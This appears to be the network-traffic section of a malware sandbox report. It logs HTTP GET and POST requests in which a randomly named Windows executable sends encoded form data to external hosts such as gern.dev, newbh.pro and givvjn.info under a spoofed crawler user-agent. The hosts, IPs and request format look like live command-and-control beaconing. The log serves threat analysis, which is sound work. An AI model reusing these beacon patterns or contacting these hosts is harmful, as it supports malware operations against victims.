9F=FBvfvEoMtYaKp75LknqmgGxT3PTkcdQVPScngp1cditrJLblP1YykPiRFlRtb+53R97m8fnU3W6TZLsvo0yJ271JkIUOzdBzKq2rJs0+Mupoabgw5rYWEyzitYztHsKnwRjVdSMOTXTexuAg0BZvfNiKVDzapacINYbzCmwD8UWUi57jYDUxBnpe2AIeJgiWyK98PT6kJNpSMq7vzDlDlZvRN1vO0IhEW2qKPILyL6qDWyTQIfW2bOrbKPspPOTtgAff2fSqIbXlRbLeH6lLIxXikiuKTwjJn9katYLzBtKizS+PuCrDQu14K1h3iJqQ8wGtfKJ66olm3FTEdwTyqDCGrsL2uaY2IJXDB5ZnMFe4fxAZQRHjPQilor0eY5qp17AEfw+Gi6xEWG9eeNlJXmQDEt5ayAZj9sBVCxhz46wtUPmv1vv7rPYPlreq2aj/1z0oD4NqzU413wibMNzgLaW1wsFPWWjWgCZSUlfTO/lhkX3if/B1ib0ho+eMvEv51DXgU5afEy1aQ4D0uqW7pIpwagFSCLKuGPFzSVjTe2eghEOGlwal9B+u2DxIAJ06CQkVAYKqT5tbwE4cRrAzildTdU+5It1sLpuPk+Fr5JkS1eO2oUVrA9hWIQSm6kui2tHFmD6Auv/oOb8sdWweUowfVwFIHaflM+fh1AwmMl5y2CNznD6Y47SCoXDf30unpB3wqJfgVMPFVMgXuI+dLh2IMs3Fp8LDiaih9t/dAd1iXZn+h4unVqydrt0vIDKomuFeaXAJJXtQYFPKbw6Kh/boaR5HCD7h3uILKvAZYKo0kaAdkZx+aIVn3gANSgDdJR/XLsf2THki7pi1zOmNpykddYAPSX45DJTOHGP8Vs9/3RRwnf3XXGQpQvPw3/3Hn9XAMd8xaV3f7jvQ9OGhOP5Og9EA0z5VQEZQDa739qYVQfREsMBAEum0FdKsKvNdXPp8atj87OKZZJmByRsgjmIKQMqqbGhuEOTCCi8TFCAkc5Go7 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49972	47.83.1.90	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:14.674756050 CET	426	OUT	GET /wl3x/?9F=IDH/sxYsqLulkbctqSbdtx5w6svLFYBpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeIvIpAz78Fkv0uY+bcXdYna/YYRI4X4Lt1dDHtrJaiCZnHtgyfQjAASlTW&wtE0B=1LjxZz HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.givvjn.info Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 01:55:16.268805027 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 00:55:16 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.7	49974	185.151.30.223	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:21.360460043 CET	674	OUT	POST /xbnt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.gern.dev Origin: http://www.gern.dev Referer: http://www.gern.dev/xbnt/ Content-Length: 215 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 6d 6f 67 76 4b 43 5a 62 75 4f 56 5a 6a 73 66 61 67 4b 57 32 62 78 63 57 45 44 79 72 45 51 5a 36 4d 30 75 4a 70 77 34 67 7a 73 70 49 74 56 54 30 30 33 55 53 47 49 64 45 6b 43 41 75 47 6b 69 4a 68 65 54 35 2f 4b 6c 45 66 64 53 70 44 7a 4c 5a 32 36 4c 6a 66 78 74 38 35 78 56 6e 51 49 30 57 59 6b 4c 6c 4c 77 34 50 69 51 43 44 5a 46 78 6f 6c 58 75 44 71 57 65 63 39 4d 70 32 70 58 47 4e 69 4a 69 2f 67 61 55 6f 6c 4c 49 39 43 49 33 30 38 36 57 41 4e 77 36 64 5a 45 39 52 73 5a 4d 73 41 33 37 77 46 6a 5a 53 6b 4a 31 4f 77 79 74 2b 6e 55 63 30 4c 6d 7a 6a 7a 4d 55 63 74 41 34 6d 64 78 32 32 47 53 77 6b 51 4b 66 6d 59 79 66 79 45 41 3d 3d Data Ascii: 9F=mogvKCZbuOVZjsfagKW2bxcWEDyrEQZ6M0uJpw4gzspItVT003USGIdEkCAuGkiJheT5/KlEfdSpDzLZ26Ljfxt85xVnQI0WYkLlLw4PiQCDZFxolXuDqWec9Mp2pXGNiJi/gaUolLI9CI3086WANw6dZE9RsZMsA37wFjZSkJ1Owyt+nUc0LmzjzMUctA4mdx22GSwkQKfmYyfyEA==
Jan 11, 2025 01:55:22.122015953 CET	212	IN	HTTP/1.1 403 content-length: 93 cache-control: no-cache content-type: text/html x-via: ASH1 connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49975	185.151.30.223	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:23.912136078 CET	694	OUT	POST /xbnt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.gern.dev Origin: http://www.gern.dev Referer: http://www.gern.dev/xbnt/ Content-Length: 235 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 6d 6f 67 76 4b 43 5a 62 75 4f 56 5a 6a 4d 50 61 6d 74 36 32 4b 42 63 56 4b 6a 79 72 57 51 59 53 4d 30 71 4a 70 78 4e 39 30 65 39 49 73 77 33 30 31 32 55 53 48 49 64 45 38 53 41 68 5a 30 69 41 68 65 66 62 2f 50 4e 45 66 64 47 70 44 79 37 5a 32 4e 6e 67 65 68 74 2b 6e 52 56 6c 55 49 30 57 59 6b 4c 6c 4c 78 64 59 69 51 4b 44 5a 31 42 6f 33 6c 47 41 30 47 65 66 38 4d 70 32 2b 6e 48 45 69 4a 69 52 67 59 67 47 6c 4a 77 39 43 4a 48 30 38 76 71 44 59 41 36 62 45 55 38 66 72 71 35 30 5a 58 6e 63 49 77 68 4d 70 5a 64 77 34 6b 73 63 39 32 51 59 56 33 4c 59 33 4f 77 71 36 6d 6c 54 66 77 79 75 4c 77 45 46 50 39 36 4d 56 67 2b 32 53 33 53 48 4c 45 2b 4a 75 67 47 68 6c 4b 35 6f 73 68 54 39 78 75 4d 3d Data Ascii: 9F=mogvKCZbuOVZjMPamt62KBcVKjyrWQYSM0qJpxN90e9Isw3012USHIdE8SAhZ0iAhefb/PNEfdGpDy7Z2Nngeht+nRVlUI0WYkLlLxdYiQKDZ1Bo3lGA0Gef8Mp2+nHEiJiRgYgGlJw9CJH08vqDYA6bEU8frq50ZXncIwhMpZdw4ksc92QYV3LY3Owq6mlTfwyuLwEFP96MVg+2S3SHLE+JugGhlK5oshT9xuM=
Jan 11, 2025 01:55:24.607872009 CET	225	IN	HTTP/1.1 502 Bad Gateway content-length: 107 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 72 65 74 75 72 6e 65 64 20 61 6e 20 69 6e 76 61 6c 69 64 20 6f 72 20 69 6e 63 6f 6d 70 6c 65 74 65 20 72 65 73 70 6f 6e 73 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>502 Bad Gateway</h1>The server returned an invalid or incomplete response.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49976	185.151.30.223	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:26.461126089 CET	1707	OUT	POST /xbnt/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.gern.dev Origin: http://www.gern.dev Referer: http://www.gern.dev/xbnt/ Content-Length: 1247 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 6d 6f 67 76 4b 43 5a 62 75 4f 56 5a 6a 4d 50 61 6d 74 36 32 4b 42 63 56 4b 6a 79 72 57 51 59 53 4d 30 71 4a 70 78 4e 39 30 65 46 49 73 47 72 30 30 52 34 53 45 49 64 45 69 43 41 31 5a 30 6a 43 68 65 58 66 2f 50 42 2b 66 65 2b 70 5a 51 44 5a 30 34 54 67 48 78 74 2b 76 78 56 6d 51 49 31 55 59 6b 62 68 4c 77 74 59 69 51 4b 44 5a 32 5a 6f 6e 6e 75 41 7a 32 65 63 39 4d 70 71 70 58 48 6f 69 4a 71 6e 67 59 6b 34 6b 34 51 39 43 70 58 30 36 64 43 44 45 51 36 5a 48 55 39 43 72 71 6c 56 5a 58 72 51 49 78 46 79 70 61 39 77 34 68 41 4b 36 46 34 59 42 68 58 43 31 49 52 47 32 57 6c 47 64 43 2b 52 49 54 73 6a 47 39 69 57 57 52 6e 2b 63 41 37 65 54 47 32 44 76 53 6d 58 6f 64 67 5a 78 68 7a 47 31 72 52 59 66 6b 79 34 6a 6b 47 34 46 67 4f 56 4a 6f 74 4b 74 33 31 6c 45 39 37 6c 4a 44 6c 79 2f 50 79 49 7a 37 52 55 69 59 2b 73 4e 56 72 7a 65 61 79 76 66 4b 64 56 6c 45 43 6a 77 52 41 41 4e 62 56 63 54 6e 67 30 71 70 4b 35 45 66 7a 57 56 71 57 2f 51 68 4d 76 65 59 52 48 66 62 71 34 2b 75 42 45 4e 64 65 58 51 42 64 [TRUNCATED] Data Ascii: 9F=mogvKCZbuOVZjMPamt62KBcVKjyrWQYSM0qJpxN90eFIsGr00R4SEIdEiCA1Z0jCheXf/PB+fe+pZQDZ04TgHxt+vxVmQI1UYkbhLwtYiQKDZ2ZonnuAz2ec9MpqpXHoiJqngYk4k4Q9CpX06dCDEQ6ZHU9CrqlVZXrQIxFypa9w4hAK6F4YBhXC1IRG2WlGdC+RITsjG9iWWRn+cA7eTG2DvSmXodgZxhzG1rRYfky4jkG4FgOVJotKt31lE97lJDly/PyIz7RUiY+sNVrzeayvfKdVlECjwRAANbVcTng0qpK5EfzWVqW/QhMveYRHfbq4+uBENdeXQBdO3iylIcMbA6yii4hDzSpDs7NpCGrgZl4jFsZcdxu7x/QCfgaRupMO9c03zR5NWQC1kCg3Ywo5Yv0nh9joCGvbjMuSDpkrNLIaPE8Rm3EHLfG6AGRoa20RJggrvP+zzqkqnyWc+b2u2rsoHG5Dw4SlL6+DkOPbJoGl5ODurYg8NLU5PxawzXc24QAAwAb1pFJkDufkKgMSuYiOxVl5kN4Z1kaEB7CoaGUsv5K3TmK0vimjIv5dXjPu+2AI7YyqEDM7t+LYqCNAwvHqa+aleDD45LRy7k8Lci6MQfoleH2Xw2ONged1wSwG8lF8cPKXvRENGwq4CeUUx/YibDN4FX+lYgKCOLGxAjNFwXpvPzSYhxyR5ljVa1peEbj88DEz8djCLixzQJqgu3oXxk+rEfvBaI6l5O/FcQ2jQ5oxbcfpO4jwQm6RBq0f2LOLU+it1xsIowZu721MFJULyxCFjrUTdS7mvlThsuQ+WnXozaI6X9PUrC6JkTvPwgP5RePEX3FP+YJIOxg7zXsnjYwPBDWqqoNG63nQMu/ADlL8DyDpul7Z8fGAW57uob4dHFQh81Sv3TZQvQnaOWbeVwBWDgICLLdKqf4dvIz2JlMlZoPPTA+TFvVBV0+T0emAitJmvomNrP+0CBj0zRlHYNZr93vw7cBlUQp4eOwKI [TRUNCATED]
Jan 11, 2025 01:55:27.239984035 CET	212	IN	HTTP/1.1 403 content-length: 93 cache-control: no-cache content-type: text/html x-via: ASH1 connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49977	185.151.30.223	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:29.002614975 CET	423	OUT	GET /xbnt/?9F=rqIPJyQOuOJXv4fbpZifam4NGQmFDlkIBDm/oxxW981wllDAxGsmTrFlhRhIH2nC7YG/ucdsY/agAUz7mNPlHSFHpTMESY5PIg2QQDYfpCfgaUZe3U6n0Vyz+dFy5VePm5+jk7AWmLgw&wtE0B=1LjxZz HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Host: www.gern.dev Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/)
Jan 11, 2025 01:55:29.767249107 CET	275	IN	HTTP/1.1 403 date: Sat, 11 Jan 2025 00:55:24 GMT content-type: text/html content-length: 93 cache-control: no-cache x-cdn-cache-status: MISS x-via: ASH1 connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49978	176.57.65.76	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:34.916279078 CET	677	OUT	POST /fpja/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.newbh.pro Origin: http://www.newbh.pro Referer: http://www.newbh.pro/fpja/ Content-Length: 215 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 46 57 47 32 41 36 4a 7a 59 51 49 75 67 63 5a 32 57 76 43 62 6e 77 55 31 41 46 62 38 42 34 6e 47 4b 41 38 39 61 7a 39 76 37 34 79 4f 2b 48 6a 58 36 31 4c 72 4d 4e 59 44 74 47 31 55 30 79 51 74 6e 49 36 41 79 76 5a 52 72 72 62 71 71 49 51 66 4f 4e 37 4b 4f 42 49 41 36 2f 4a 52 41 47 43 53 53 4a 76 54 31 31 74 76 50 31 35 45 62 53 73 76 6d 2b 34 74 52 65 55 76 49 65 31 73 2f 32 71 6c 53 78 41 4e 31 32 6d 59 2f 51 2f 7a 43 48 4b 62 46 79 31 37 5a 69 4b 50 62 62 4f 4f 41 46 71 6f 47 62 44 58 6c 64 50 64 78 6e 56 44 56 6a 59 47 49 67 44 32 69 63 57 34 41 39 65 4b 51 55 33 73 6c 63 55 6f 5a 46 66 58 66 49 50 35 58 36 4e 6b 4b 51 3d 3d Data Ascii: 9F=FWG2A6JzYQIugcZ2WvCbnwU1AFb8B4nGKA89az9v74yO+HjX61LrMNYDtG1U0yQtnI6AyvZRrrbqqIQfON7KOBIA6/JRAGCSSJvT11tvP15EbSsvm+4tReUvIe1s/2qlSxAN12mY/Q/zCHKbFy17ZiKPbbOOAFqoGbDXldPdxnVDVjYGIgD2icW4A9eKQU3slcUoZFfXfIP5X6NkKQ==
Jan 11, 2025 01:55:35.612293005 CET	914	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=byZ7nwfmbQ9hXmQg; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 01:15:35 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 01:15:35 GMT Set-Cookie: __ddg10_=1736556935; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 01:15:35 GMT Set-Cookie: __ddg1_=f6mH0J5VglCEVYa5DPLy; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 00:55:35 GMT date: Sat, 11 Jan 2025 00:55:35 GMT content-type: text/html; charset=iso-8859-1 content-length: 235 location: https://www.newbh.pro/fpja/ x-host: www.newbh.pro x-tilda-server: 30 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49979	176.57.65.76	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:37.461265087 CET	697	OUT	POST /fpja/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.newbh.pro Origin: http://www.newbh.pro Referer: http://www.newbh.pro/fpja/ Content-Length: 235 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 46 57 47 32 41 36 4a 7a 59 51 49 75 6d 2f 52 32 56 4d 36 62 68 51 55 79 44 46 62 38 55 49 6e 43 4b 41 67 39 61 79 70 2f 37 4b 47 4f 77 48 54 58 37 30 4c 72 4e 4e 59 44 6c 6d 31 4d 70 69 51 32 6e 49 48 39 79 71 68 52 72 76 4c 71 71 4b 49 66 53 75 54 4a 63 68 49 43 79 66 4a 58 64 32 43 53 53 4a 76 54 31 31 35 4a 50 31 52 45 61 69 63 76 6e 61 73 73 4e 4f 55 73 65 4f 31 73 30 57 71 68 53 78 42 6f 31 33 36 68 2f 57 6a 7a 43 47 36 62 47 6a 31 30 43 79 4b 4a 47 72 50 62 4c 77 48 76 4b 4c 6a 31 67 73 44 6f 33 6d 68 69 64 31 5a 6b 53 43 50 61 38 4e 75 44 45 2f 36 38 48 79 71 5a 6e 64 51 77 55 6e 72 32 41 2f 71 54 61 6f 73 67 63 76 4e 4b 32 70 6f 72 6a 70 50 45 2f 62 55 34 33 59 51 49 70 39 63 3d Data Ascii: 9F=FWG2A6JzYQIum/R2VM6bhQUyDFb8UInCKAg9ayp/7KGOwHTX70LrNNYDlm1MpiQ2nIH9yqhRrvLqqKIfSuTJchICyfJXd2CSSJvT115JP1REaicvnassNOUseO1s0WqhSxBo136h/WjzCG6bGj10CyKJGrPbLwHvKLj1gsDo3mhid1ZkSCPa8NuDE/68HyqZndQwUnr2A/qTaosgcvNK2porjpPE/bU43YQIp9c=
Jan 11, 2025 01:55:38.274457932 CET	1236	IN	HTTP/1.1 301 Moved Permanently Server: ddos-guard Connection: close Set-Cookie: __ddg8_=Q4RC1kIB31DorSSp; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 01:15:37 GMT Set-Cookie: __ddg9_=8.46.123.189; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 01:15:37 GMT Set-Cookie: __ddg10_=1736556937; Domain=.newbh.pro; Path=/; Expires=Sat, 11-Jan-2025 01:15:37 GMT Set-Cookie: __ddg1_=xIoSFDzySi8iYCF3Ba8E; Domain=.newbh.pro; HttpOnly; Path=/; Expires=Sun, 11-Jan-2026 00:55:37 GMT date: Sat, 11 Jan 2025 00:55:38 GMT content-type: text/html; charset=iso-8859-1 content-length: 399 location: https://www.newbh.pro/fpja/?jrph=IUuWDP5KSR42idQ8V9eL5H4IAUuVA+zBaCctSylP56Crxmno30P/av4JsAs21D4yvOaE2KpIj83Zn/A/H7bRFCoBwYdtSkqfE87Ev09JJUQ5bSZyiLUvXvw/Q+xugWulPHUUz08=&6J8=ARq0BbC0JpNdk x-host: www.newbh.pro x-tilda-server: 28 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6e 65 77 62 68 2e 70 72 6f 2f 66 70 6a 61 2f 3f 6a 72 70 68 3d 49 55 75 57 44 50 35 4b 53 52 34 32 69 64 51 38 56 39 65 4c 35 48 34 49 41 55 75 56 41 2b 7a 42 61 43 63 74 53 79 6c 50 35 36 43 72 78 6d 6e 6f 33 30 50 2f 61 76 34 4a 73 41 73 32 31 44 34 79 76 4f 61 45 32 4b 70 49 6a 38 33 5a 6e 2f 41 2f 48 37 62 52 46 43 6f 42 77 59 64 74 53 6b 71 66 45 38 37 45 76 30 39 4a 4a 55 51 35 62 53 5a 79 69 4c 55 76 58 76 77 2f 51 2b 78 75 67 57 75 6c [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.newbh.pro/fpja/?jrph=IUuWDP5KSR42idQ8V9eL5H4IAUuVA+zBaCctSylP56Crxmno30P/av4JsAs21D4yvOaE2KpIj83Zn/A/H7bRFCoBwYdtSkqfE87Ev09JJUQ5bSZyiLUvXvw/Q+xugWulPHUUz08=&6J8=ARq0BbC0JpNdk">here</a>.</p></body></html
Jan 11, 2025 01:55:38.274477005 CET	2	IN	Data Raw: 3e 0a Data Ascii: >

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	49980	176.57.65.76	80	1228	C:\Program Files (x86)\fZntWIwPsvXltFXeGadUlvMRdPOdaWZtaZLBrrFdufYUijSKGLHiGSUyPjh\fIydfvfomIEE.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 01:55:40.123722076 CET	1710	OUT	POST /fpja/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate Host: www.newbh.pro Origin: http://www.newbh.pro Referer: http://www.newbh.pro/fpja/ Content-Length: 1247 Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close User-Agent: Mozilla/5.0 (compatible; linkdexbot/2.0; +http://www.linkdex.com/bots/) Data Raw: 39 46 3d 46 57 47 32 41 36 4a 7a 59 51 49 75 6d 2f 52 32 56 4d 36 62 68 51 55 79 44 46 62 38 55 49 6e 43 4b 41 67 39 61 79 70 2f 37 4b 65 4f 77 30 62 58 36 54 66 72 66 39 59 44 6b 6d 31 50 70 69 51 33 6e 49 65 32 79 71 64 6e 72 74 44 71 72 76 63 66 43 66 54 4a 46 52 49 43 2b 2f 4a 53 41 47 44 61 53 4a 2f 58 31 31 70 4a 50 31 52 45 61 68 45 76 75 75 34 73 50 4f 55 76 49 65 31 6f 2f 32 72 32 53 78 5a 53 31 33 2b 78 2f 6c 37 7a 44 6d 71 62 45 52 64 30 4f 79 4b 4c 46 72 4f 59 4c 77 44 67 4b 49 58 35 67 73 32 46 33 6b 42 69 65 42 34 4f 49 77 50 58 67 76 6d 2b 4c 2b 61 65 4e 77 47 71 6c 76 6f 63 4c 47 7a 4c 46 49 36 4b 61 2b 49 41 53 5a 46 53 75 36 51 39 36 72 2f 30 2f 76 46 32 67 34 49 66 34 70 65 36 35 52 53 62 6a 78 32 6f 2f 62 71 52 6c 30 64 65 42 38 48 63 4e 71 4e 50 76 47 6d 6f 57 45 71 54 58 2f 36 74 66 34 69 38 32 69 39 55 57 42 34 2f 34 31 31 5a 30 47 70 37 37 53 66 46 32 76 69 5a 48 7a 4a 44 42 44 6f 38 36 47 44 55 4b 6a 2b 72 6d 56 37 65 30 2b 57 43 43 31 78 43 56 79 6c 36 4e 2f 33 2f 56 4c 45 [TRUNCATED] Data Ascii: 9F=FWG2A6JzYQIum/R2VM6bhQUyDFb8UInCKAg9ayp/7KeOw0bX6Tfrf9YDkm1PpiQ3nIe2yqdnrtDqrvcfCfTJFRIC+/JSAGDaSJ/X11pJP1REahEvuu4sPOUvIe1o/2r2SxZS13+x/l7zDmqbERd0OyKLFrOYLwDgKIX5gs2F3kBieB4OIwPXgvm+L+aeNwGqlvocLGzLFI6Ka+IASZFSu6Q96r/0/vF2g4If4pe65RSbjx2o/bqRl0deB8HcNqNPvGmoWEqTX/6tf4i82i9UWB4/411Z0Gp77SfF2viZHzJDBDo86GDUKj+rmV7e0+WCC1xCVyl6N/3/VLEnqm2Qy1pQY3bHTW29VfBGHQg6b0SHiM6oGKpLsrhzgvjJft9OtE/pJ5gU/xaTGm+gDR0mo38r4kEH7vhMJaaVNjr4ZAcBcpENbqiiCn98GfU7J+w8VQlQbujjXgSFnhidekJSs0BeYGvy8vc6qmDs1O6mHE+rWUsWOukbRHnLpsVTExo91ZIcw7GHHFjw+dyW1hnt3Q40r30KT5650wn5ROrIHL4KHX3jEAtMNvFgIpP+vgMKJeBW52DMJ718cQ8Q82kAKKiqobY/YQO7QlkLf8uXxBm5tIUohWHBIPP58bipUh5cnbg5VAUfdgEhIMiV84/7tioFD/3X1Bzj1rF2A3Xuqonf2s